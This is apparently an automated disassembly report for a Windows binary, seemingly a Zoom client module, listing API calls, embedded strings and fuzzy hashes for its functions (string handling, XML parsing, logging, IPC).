                • Opcode Fuzzy Hash: 7a6723998683841eb857a0c41d6520c26ef88275d1670b49f04fb273f24f7f40
                • Instruction Fuzzy Hash: 6C21CF30200656BFDB159F26C585ABAFBA5FF44324F44801AE90647A81CB71B8A5DBD0
                APIs
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00CE0220), ref: 00CDC31C
                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?,?,00CE0220), ref: 00CDC32E
                • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,?,?,00CE0220), ref: 00CDC335
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,00CE0220), ref: 00CDC353
                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00CE0220), ref: 00CDC35F
                • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,00CE0220), ref: 00CDC366
                Similarity
                • API ID: Heap$ByteCharMultiProcessWide$AllocFree
                • String ID:
                • API String ID: 1621643742-0
                • Opcode ID: a83dc9a52ede66ab4ba76fdc02e670ae88f96bc535d6c4b9f892c4728850966a
                • Instruction ID: c9ace1a3f7e8f1a7a695f96addad46d38702aa3ea971d6aa28bf41e0e7c4cf06
                • Opcode Fuzzy Hash: a83dc9a52ede66ab4ba76fdc02e670ae88f96bc535d6c4b9f892c4728850966a
                • Instruction Fuzzy Hash: CA113AB5500201BFDB219B66DC48DAB7BBDEBCAB10B108119FA15C2260DB70DA02DA70
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,00C5C592,?,?), ref: 00C5E2BE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,00C5C592,?,?), ref: 00C5E2D4
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,?,?,00C5C592,?,?), ref: 00C5E2EE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,80000041,00000000,?,?,?,00C5C592,?,?), ref: 00C5E30D
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,00C5C592,?,?), ref: 00C5E321
                • #23.MAPI32(?,?,?,00C5C592,?,?), ref: 00C5E32C
                Similarity
                • API ID: Cmm@@State@Unlock@
                • String ID:
                • API String ID: 3914272143-0
                • Opcode ID: 12b928658e030a9c71e3babdfc9a8b86274852f4e86589978ec45bac2e9a0ddf
                • Instruction ID: f34590280e8338918677ed1e716e8438590a079314ce1f7fcf95473d14615418
                • Opcode Fuzzy Hash: 12b928658e030a9c71e3babdfc9a8b86274852f4e86589978ec45bac2e9a0ddf
                • Instruction Fuzzy Hash: 0D111975600A25AFC708DF69D884859BBB9FF48315304816EE91AD7720CB30BD51CFA4
                APIs
                • GetLastError.KERNEL32(?,?,00CE8381,00CE9663,?,00CDEE37,00CE0570,?,?), ref: 00CE8398
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CE83A6
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE83BF
                • SetLastError.KERNEL32(00000000,00CE8381,00CE9663,?,00CDEE37,00CE0570,?,?), ref: 00CE8411
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 0178deb9723ec45d370185ea4778a587d4a8e4194ba42d28eb8c05566d5988a5
                • Instruction ID: 861da34c49eac7f47e44cae58a259aae1ccd9010de67640e1cca73a94db8f45e
                • Opcode Fuzzy Hash: 0178deb9723ec45d370185ea4778a587d4a8e4194ba42d28eb8c05566d5988a5
                • Instruction Fuzzy Hash: 3301473221A3926EA6212B777CC56573B44EB41734320032AF53C852F1EFA24E0A6160
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAA79B
                • ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(?,0000003C,00CAAF57,?,0000003C), ref: 00CAA7A7
                • ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(?,?,0000003C,00CAAF57,?,0000003C), ref: 00CAA7B7
                • ?rfind@?$CStringT@_W@Cmm@@QBEI_WI@Z.RWSNDPQSKZ(0000002E,000000FF,?,?,0000003C,00CAAF57,?,0000003C), ref: 00CAA7C6
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@I@Z.RWSNDPQSKZ(?,00000001,?,?,0000003C,00CAAF57,?,0000003C), ref: 00CAA7DE
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,0000003C,00CAAF57,?,0000003C), ref: 00CAA7F6
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                Similarity
                • API ID: Cmm@@String$??0?$Compare@?$$?rfind@?$DeallocateH_prolog3_V01@V01@@
                • String ID:
                • API String ID: 4232220682-0
                • Opcode ID: 402d6d1aac398b536132d0bd550d5cd595503d49ded56db071aff824c6525bd0
                • Instruction ID: f8fa7d26f289dff37dc48c91614dd2a8d0fc854328bad5c05e56ce8b129d2410
                • Opcode Fuzzy Hash: 402d6d1aac398b536132d0bd550d5cd595503d49ded56db071aff824c6525bd0
                • Instruction Fuzzy Hash: 26012839A002155BCB14AB74DC426EDB2245F45725F044325EC32762C2EF749B8AD725
                APIs
                • ?Stop@CIPCChannelThread@ssb_ipc@@QAEHXZ.RWSNDPQSKZ ref: 00C780C6
                • EnterCriticalSection.KERNEL32(?), ref: 00C780D3
                • LeaveCriticalSection.KERNEL32(?), ref: 00C780DD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00C780FD
                • ??1Channel@ssb_ipc@@QAE@XZ.RWSNDPQSKZ ref: 00C78112
                • ?Detach@CThread@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00C7811A
                Similarity
                • API ID: Cmm@@CriticalSection$ChannelChannel@ssb_ipc@@Detach@EnterLeaveState@Stop@Thread@Thread@ssb_ipc@@Unlock@
                • String ID:
                • API String ID: 360572120-0
                • Opcode ID: 82745fd74b46d8eef38317a0795512dedecc064900e4ca93d552d5039da7031b
                • Instruction ID: afef9fdb0906a9c1e22c460717f9f42ad29ebc5fb409069c0ec7c1a622dd95fb
                • Opcode Fuzzy Hash: 82745fd74b46d8eef38317a0795512dedecc064900e4ca93d552d5039da7031b
                • Instruction Fuzzy Hash: 1101F935640710ABCB15EF65C89A9AE7779AF457107048058FE069B355CFB0ED09E7B0
                APIs
                • __EH_prolog3.LIBCMT ref: 00CAAEB7
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000004,00CAAA52,?,00000000,?), ref: 00CAAECA
                • ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000004,00CAAA52,?,00000000,?), ref: 00CAAEDB
                  • Part of subcall function 00CAB760: ?IsSeparator@FilePath@Cmm@@SA_N_W@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,00CAAE10,?,00000008,00CAA957,?), ref: 00CAB78F
                  • Part of subcall function 00CAB760: ?IsSeparator@FilePath@Cmm@@SA_N_W@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,00CAAE10,?,00000008,00CAA957,?), ref: 00CAB7B8
                • ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,00000001,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAEF1
                • ?find_last_of@?$CStringT@_W@Cmm@@QBEIPB_WII@Z.RWSNDPQSKZ(?,000000FF,00000002,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAF01
                • ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,00000001,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAF1A
                Similarity
                • API ID: Cmm@@$String$FilePath@$?erase@?$Separator@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@$??0?$?find_last_of@?$H_prolog3Internal@SeparatorsStripTrailingV01@@
                • String ID:
                • API String ID: 204599755-0
                • Opcode ID: e933c5611c5e776bc9265b738b5b3dff8f4ab2337bde28edcbd29a7f85b18879
                • Instruction ID: bcdbaf4457a71a3f60a72720c39d685d4842b9acaceaf61fc2d8559a8364b81f
                • Opcode Fuzzy Hash: e933c5611c5e776bc9265b738b5b3dff8f4ab2337bde28edcbd29a7f85b18879
                • Instruction Fuzzy Hash: 7DF0A4747045155BCE1CB769881657EE1959FD1B28F20030EF226972D1DFB04E86939A
                APIs
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB2012
                • ?NewElement@XMLDocument@tinyxml2@@QAEPAVXMLElement@2@PBD@Z.RWSNDPQSKZ(00000000), ref: 00CB201A
                • ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ(00000000), ref: 00CB2029
                  • Part of subcall function 00CAFC00: ?CollapseWhitespace@StrPair@tinyxml2@@AAEXXZ.RWSNDPQSKZ ref: 00CAFD38
                • ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ(00000000), ref: 00CB2033
                • ?FindOrCreateAttribute@XMLElement@tinyxml2@@AAEPAVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB203B
                  • Part of subcall function 00CB1C30: ?CreateAttribute@XMLElement@tinyxml2@@AAEPAVXMLAttribute@2@XZ.RWSNDPQSKZ ref: 00CB1C67
                  • Part of subcall function 00CB1C30: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000010,00000000), ref: 00CB1C82
                • ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000,00000000,00000000), ref: 00CB2046
                  • Part of subcall function 00CAFA70: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(000003E8,00000001,00000000,?,00CB2987,00000000,00000000), ref: 00CAFA78
                Similarity
                • API ID: Pair@tinyxml2@@$Str@$Attribute@Attribute@2@CreateElement@tinyxml2@@$CollapseDocument@tinyxml2@@Element@Element@2@FindNode@tinyxml2@@Reset@Value@Whitespace@
                • String ID:
                • API String ID: 3780913149-0
                • Opcode ID: abb86da71ec74ef795c4d604ec96bdd72c31f4a2b7bc9d47c008fc3e50b7d550
                • Instruction ID: e55ade2261dc42d0eb523d01b89f757ea3facb73e71e1463b983584d612f2aa3
                • Opcode Fuzzy Hash: abb86da71ec74ef795c4d604ec96bdd72c31f4a2b7bc9d47c008fc3e50b7d550
                • Instruction Fuzzy Hash: 15F02E322006223BC214BA64DC01ADAB36CBFA8374B120139F806A3641CF70FD12E7E0
                APIs
                • __EH_prolog3.LIBCMT ref: 00CDE61D
                  • Part of subcall function 00CDC00B: GetProcessHeap.KERNEL32(?,00000000,00CDD955,00000004,00CDD727,00DFFBA8,?,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDC037
                  • Part of subcall function 00CDCE9E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,80004005,?,?,?,80070057,?,00CDCCE1,00000000,?,?,80070057,00000000), ref: 00CDCEB4
                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00A00000,00000000,?,00000000,0000001C,00CE0252,?,?,00000000,00000000,00000000), ref: 00CDE668
                • GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?), ref: 00CDE749
                  • Part of subcall function 00CDE975: __EH_prolog3.LIBCMT ref: 00CDE97C
                  • Part of subcall function 00CDCF54: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,00CDCBB8,?,?,?,?,00CDE13E,00000000,?,?,00000028,00CDCA03,?,?), ref: 00CDCF62
                  • Part of subcall function 00CDCF54: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000002,?,?,00CDE13E,00000000,?,?,00000028,00CDCA03,?,?,?,?,?,?), ref: 00CDCF8C
                Strings
                Similarity
                • API ID: Cmm@@State@Unlock@$H_prolog3Process$CreateCurrentFileHeapMapping
                • String ID: Couldn't create shared memory view.$Couldn't initialize shared memory.
                • API String ID: 268392948-658901668
                • Opcode ID: 5679805183df39deecf0841e3548aefff9e12d80005335d281624ca2803413d4
                • Instruction ID: 261d172ea10622f0e7bd9f1c6466360e7cc2ce249e4e53eb25339a868a1c1b2d
                • Opcode Fuzzy Hash: 5679805183df39deecf0841e3548aefff9e12d80005335d281624ca2803413d4
                • Instruction Fuzzy Hash: F3B14E719102418FDB54EF68C495BAD7BE1AB08310F1589BEEA4EAF342DB309D44DBA0
                APIs
                • GetModuleHandleA.KERNEL32(ntdll.dll,LdrUnregisterDllNotification), ref: 00CD4059
                • GetProcAddress.KERNEL32(00000000), ref: 00CD4060
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00CD4074
                Strings
                Similarity
                • API ID: AddressCmm@@HandleModuleProcState@Unlock@
                • String ID: LdrUnregisterDllNotification$ntdll.dll
                • API String ID: 2495340779-237666150
                • Opcode ID: bde03ba296c5749fabb7f12327a591864e34d3dbad9c4805d21d6767b550b782
                • Instruction ID: eb12e2245ac4214fa1f6d66d840f62099e9590680b3cc94c3d90668bba9eddbb
                • Opcode Fuzzy Hash: bde03ba296c5749fabb7f12327a591864e34d3dbad9c4805d21d6767b550b782
                • Instruction Fuzzy Hash: CF518C31610542ABE70C9B38CC99BFDF7A6FB44344F544329E229877A1DB38A965CB90
                APIs
                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00D0E2DF), ref: 00D0410F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,?), ref: 00D04283
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000002,?,?), ref: 00D042C9
                Strings
                Similarity
                • API ID: Cmm@@State@Unlock@$DecodePointer
                • String ID: log
                • API String ID: 1417264913-2403297477
                • Opcode ID: e623d47c890d1a7b2514a68fd4b6e9ce1bb581c5f784d436c6dcc27bfef20348
                • Instruction ID: 6bb314764f7fc4e078fca42e9356d80e83f248d98e0f7c0c5a6e287c6ac79885
                • Opcode Fuzzy Hash: e623d47c890d1a7b2514a68fd4b6e9ce1bb581c5f784d436c6dcc27bfef20348
                • Instruction Fuzzy Hash: E051D3B4A0461EDBCF209FA9E84CABD7F70FF55308F154044E698A7294CB308965CB79
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C646AA
                  • Part of subcall function 00C526E4: __EH_prolog3.LIBCMT ref: 00C526EB
                • ?GetBuffer@?$CStringT@D@Cmm@@QAEPADI@Z.RWSNDPQSKZ(?,?,0000FDE9,?,?,?), ref: 00C6478C
                • ?cmm_str_convert@@YAIHPADIHPBDI@Z.RWSNDPQSKZ(00000000,00000000,?,?,0000FDE9,?,?,?), ref: 00C64793
                • ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(?,00000000,00000000), ref: 00C647B8
                Strings
                Similarity
                • API ID: Cmm@@String$?cmm_str_convert@@Assign@?$Buffer@?$H_prolog3H_prolog3_
                • String ID: 0
                • API String ID: 3998168562-4108050209
                • Opcode ID: 6d42312ca2aa78603f3ecbb00a60f0c08b565bdc666a0c6d8020c9bded45192e
                • Instruction ID: 5f582f0efcddb719e79029c9fabc1ddb24143cabf9bdb5fd1f03a850bcf7c2ea
                • Opcode Fuzzy Hash: 6d42312ca2aa78603f3ecbb00a60f0c08b565bdc666a0c6d8020c9bded45192e
                • Instruction Fuzzy Hash: 80417274D002489FCF14EFA4C995BDDBBB8EF54301F548469E805B7242DB70AA89DF60
                APIs
                Strings
                Similarity
                • API ID: H_prolog3Initstd::locale::_
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 302037079-1866435925
                • Opcode ID: 46bf783e0d36b40b3790a4d53f202e5c8178aadcb5d7150eac67881be557edaa
                • Instruction ID: 865d0c85ef9ab91b6a3a24538c840aeaa1a9623f9682d73b2b524a5111cb8a06
                • Opcode Fuzzy Hash: 46bf783e0d36b40b3790a4d53f202e5c8178aadcb5d7150eac67881be557edaa
                • Instruction Fuzzy Hash: 692108B2900705BFD704EF66D482B99B7E4FF08300F54412EE9189B6C2DBB4A994CBD4
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBEAF2
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(00000000,00000054,00CBEDAF,00DFFA28,?,00DFFA28,00DFFA28,00DFFA28,00DFFA28,?,00CBEE52,00000000,00000000,?), ref: 00CBEB14
                • ?cmm_fs_read@@YAHPB_WAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(00DFFA28,00000054,last_log_file_id.txt,00D3D264,?,00D35050,00000000,00000054,00CBEDAF,00DFFA28,?,00DFFA28), ref: 00CBEB72
                  • Part of subcall function 00C62D90: __EH_prolog3_GS.LIBCMT ref: 00C62D97
                  • Part of subcall function 00C62D90: ?GetSize@CFile@Cmm@@QBE_KXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DE5
                  • Part of subcall function 00C62D90: ?GetBuffer@?$CStringT@D@Cmm@@QAEPADI@Z.RWSNDPQSKZ(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DEF
                  • Part of subcall function 00C62D90: ?Read@CFile@Cmm@@QAEIPAXI@Z.RWSNDPQSKZ(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DF8
                  • Part of subcall function 00C62D90: ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62E34
                • ?StringToInt@Cmm@@YAHABV?$CStringT@D@1@AAH@Z.RWSNDPQSKZ(?,?,00000054,last_log_file_id.txt,00D3D264,?,00D35050,00000000,00000054,00CBEDAF,00DFFA28,?,00DFFA28), ref: 00CBEBA7
                  • Part of subcall function 00C64310: ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(00000000,00000000,?), ref: 00C64339
                  • Part of subcall function 00C58567: _Deallocate.LIBCONCRT ref: 00C58576
                Strings
                Similarity
                • API ID: Cmm@@$String$File@$H_prolog3_$??0?$?cmm_fs_read@@Buffer@?$Close@Compare@?$D@1@D@2@@std@@@D@std@@DeallocateInt@Read@Size@U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@@W@std@@
                • String ID: last_log_file_id.txt
                • API String ID: 3437992560-1594190529
                • Opcode ID: 6e5a2bb8319f5feb25f72d6b5d2b8f9f5940d7c6733eead3f3cccddff2b14511
                • Instruction ID: 590df38f9b3444a6c5e297ab2368bed5bd3aa4b0476de3ac564cddff2d9b41fd
                • Opcode Fuzzy Hash: 6e5a2bb8319f5feb25f72d6b5d2b8f9f5940d7c6733eead3f3cccddff2b14511
                • Instruction Fuzzy Hash: 59212475C003099FCB14EFE1D9A19DDBBB4AF14301F94842EE81272291DB70AA8DDB25
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CA6CB5
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(App), ref: 00CA6CCC
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(00D3C788,App), ref: 00CA6D00
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00CA6D2E
                Strings
                Similarity
                • API ID: Cmm@@$Compare@?$State@StringUnlock@
                • String ID: App
                • API String ID: 824811217-4045616687
                • Opcode ID: fba676a8d12b7ece42415d7e29b5a0d57219c8f14008fb7ccc8fc7105d160449
                • Instruction ID: e3112c8e73d3290ed27d95e84d5b313e4ea93d4381936fde4f1cb6e2b6465611
                • Opcode Fuzzy Hash: fba676a8d12b7ece42415d7e29b5a0d57219c8f14008fb7ccc8fc7105d160449
                • Instruction Fuzzy Hash: 5711B276B0061AAF8B049F24CC5197EB369EF5A754B1D4069ED05E7341EB70FE058AF0
                APIs
                • ?ToInt@XMLUtil@tinyxml2@@SA_NPBDPAH@Z.RWSNDPQSKZ(?,00000000,?,?,00CB1094,00000000,?,?,00CA4611,?), ref: 00CB00EF
                Strings
                Similarity
                • API ID: Int@Util@tinyxml2@@
                • String ID: false$true
                • API String ID: 1465290206-2658103896
                • Opcode ID: 2a563de87d0b15967ea301ace82953a2a3a8b1a1a7b70e565d54b6ccfa1becee
                • Instruction ID: 2e28a3e4bcc5355ffcdfe3b40c016ef7f03f54ac496cd05c6e0a1b580ef42db5
                • Opcode Fuzzy Hash: 2a563de87d0b15967ea301ace82953a2a3a8b1a1a7b70e565d54b6ccfa1becee
                • Instruction Fuzzy Hash: 8C11AC35104204EBDF098F19EC41BEF3BA8DB52358F208091EC15DB261D771DE02EBA0
                APIs
                • ?ParseText@StrPair@tinyxml2@@QAEPADPADPBDHPAH@Z.RWSNDPQSKZ(?,]]>,00000002,?), ref: 00CB0AED
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000009,?,00000000), ref: 00CB0B01
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                • ?ParseText@StrPair@tinyxml2@@QAEPADPADPBDHPAH@Z.RWSNDPQSKZ(?,00D333A0,-00000002,?), ref: 00CB0B3D
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000008,?,00000000), ref: 00CB0B58
                Strings
                Similarity
                • API ID: Pair@tinyxml2@@$Document@tinyxml2@@Error@Error@2@ParseText@$Reset@Str@
                • String ID: ]]>
                • API String ID: 1961802644-1431394883
                • Opcode ID: 9f721e52a32d5a561c737e72bca5c45519dd807100a263b61e46c738cd9c376b
                • Instruction ID: 294d2181ac440868afb3bc1df48488cf401ffb7700152b2e51e7f12ccb5b73e0
                • Opcode Fuzzy Hash: 9f721e52a32d5a561c737e72bca5c45519dd807100a263b61e46c738cd9c376b
                • Instruction Fuzzy Hash: 24110431200B01BFDB365A55CC02FE77B95EF01744F18846DF567964A2E672E954E780
                APIs
                Strings
                Similarity
                • API ID: H_prolog3_
                • String ID: IdleHandler
                • API String ID: 2427045233-4254342604
                • Opcode ID: 9a2d5d8adbd19b6f7e921ba16affaa63c73e6753d1f4613c784037123742655b
                • Instruction ID: ffba7bb7c21aa9fb9e16c34f4fc902dafbd05743bd41c502361ab68c54a0fe92
                • Opcode Fuzzy Hash: 9a2d5d8adbd19b6f7e921ba16affaa63c73e6753d1f4613c784037123742655b
                • Instruction Fuzzy Hash: 74114CB4D002099FCB04EFE5D8D18FDBBB5BB18305F804069E811B6601EB709A48DB64
                APIs
                • DeleteFileW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00CADE9D,?,00000004), ref: 00CBE3E0
                • DeleteFileW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00CADE9D,?,00000004), ref: 00CBE3FD
                • OutputDebugStringW.KERNEL32(DeleteFilePath failed for file:,?,00000000,00000000,00000000,?,00CADE9D,?,00000004), ref: 00CBE40E
                • OutputDebugStringW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00CADE9D,?,00000004), ref: 00CBE41D
                  • Part of subcall function 00CBE33A: OpenProcess.KERNEL32(001FFFFF,00000000,?,00000080,00000003,?,?,00CBE6C5,00000000), ref: 00CBE352
                  • Part of subcall function 00CBE33A: GetLastError.KERNEL32(?,?,00CBE6C5,00000000,?,?,?,?,?,?,?,?,?,?,0000003C,00CADEA7), ref: 00CBE35E
                Strings
                • DeleteFilePath failed for file:, xrefs: 00CBE409
                Similarity
                • API ID: DebugDeleteFileOutputString$ErrorLastOpenProcess
                • String ID: DeleteFilePath failed for file:
                • API String ID: 3681180181-2314946318
                • Opcode ID: 2e1aef561f8fff4ce58fa1683178411ab6609af8db3d2388bc839bc80af92175
                • Instruction ID: 616f7d24b4f3c66a70e9df20f5d6769e20bc04a60d1a1c8456edde555e53bf3b
                • Opcode Fuzzy Hash: 2e1aef561f8fff4ce58fa1683178411ab6609af8db3d2388bc839bc80af92175
                • Instruction Fuzzy Hash: 5501A235500710EBCB205B59EC488CAB7FAEF84B11F14452AF442D3220DF70AA468AB5
                APIs
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000004,00000000,filename=<null>), ref: 00CB26E6
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000004,00000000,filename=%s,00000000), ref: 00CB2710
                Strings
                Similarity
                • API ID: Document@tinyxml2@@Error@Error@2@Pair@tinyxml2@@$Reset@Str@
                • String ID: filename=%s$filename=<null>
                • API String ID: 4052038411-1949359620
                • Opcode ID: 641d65dc0c12120b87c16adf83eea1e8e0dd7c1de088b22a50e3c1583c4ee868
                • Instruction ID: 3b8cd75ac6095b1263d3bd0e1a19e4d6b8aeb730372053b1c78b9a2c4c6d0470
                • Opcode Fuzzy Hash: 641d65dc0c12120b87c16adf83eea1e8e0dd7c1de088b22a50e3c1583c4ee868
                • Instruction Fuzzy Hash: 84F0B47124070076DA253915EC82FDB364D9B14754F104015FA057A2C3DDB1E51165AD
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76097
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.query.default.giphy.req,000027D1,myAccountId,defaultGiphyList,00000004), ref: 00C760B7
                  • Part of subcall function 00C85590: __EH_prolog3.LIBCMT ref: 00C85597
                  • Part of subcall function 00C85590: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85482,?,?,?,?,00000004,00C85365,?,?,?,?,?), ref: 00C855AA
                  • Part of subcall function 00C87CBE: __EH_prolog3_GS.LIBCMT ref: 00C87CC5
                  • Part of subcall function 00C87CBE: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87CEB
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D19
                  • Part of subcall function 00C87CBE: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D56
                  • Part of subcall function 00C87CBE: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive,00002727,MeetingID,Information,00000004), ref: 00C87D86
                  • Part of subcall function 00C87CBE: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information,com.Zoom.app.keepAlive), ref: 00C87DE4
                  • Part of subcall function 00C87CBE: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C69727,com.Zoom.app.keepAlive,MeetingID,Information), ref: 00C87E01
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@TreeV12@@
                • String ID: com.Zoom.app.conf.pmc.query.default.giphy.req$defaultGiphyList$myAccountId
                • API String ID: 9112088-1791266925
                • Opcode ID: 7c01381259eddae809e52b54ccea60154b99dc64b28730a71ddac2d8d72fb4e3
                • Instruction ID: 936532089230d9c76205dd6d662f4f334dd6c328a58239d019bf3cf833b90638
